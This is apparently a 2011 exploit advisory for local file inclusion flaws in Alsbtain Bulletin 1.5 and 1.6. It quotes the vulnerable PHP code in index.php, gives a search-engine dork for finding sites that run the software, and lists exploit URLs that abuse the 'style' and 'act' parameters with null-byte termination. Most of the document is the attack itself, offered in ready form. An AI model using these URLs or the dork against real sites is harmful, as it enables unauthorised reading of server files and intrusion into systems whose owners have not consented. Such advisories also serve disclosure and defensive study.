Alsbtain Bulletin versions 1.5 and 1.6 suffer from multiple local file inclusion vulnerabilities.
9a3fd172373b47da0252bf9023f0313719a8e2c25ed6eebe23244427cf6c7449
# Title : Alsbtain Bulletin (index.php) Local File include
# Author : Null H4ck3r
# Product : Alsbtain ( Alsbtain Bulletin )
# Vendor : http://www.alsbtain.net/ipb/
# Date : 25/10/2011
# Version : 1.5 , 1.6
# Tested on : windows
# Dork : Powered By Alsbtain Bulletin 1.6 & Powered By Alsbtain Bulletin 1.5
# Contact : Null.H4ck3r@Yahoo.com
================================================================
Vuln file : index.php
~~~~~~~~~~~~~~~~~~~~~~~
Vuln code:
$act=str_replace('idsb', '&id=', $_GET['act']);
header( "HTTP/1.1 301 Moved Permanently" );
header( "Status: 301 Moved Permanently" );
header( "Location: ?act=".$act );}
include("styles/$style/header.php");
include("includes/stats/addhome.php");
include("styles/$style/menu_start.php");
if(is_file("includes/".$_GET['act'].".php")){
include("includes/".$_GET['act'].".php");
} else { include("includes/home.php"); }
~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
http://localhost/index.php?style=[LFI]%00
http://localhost/index.php?act=[LFI]%00
===============================================================
That's it xD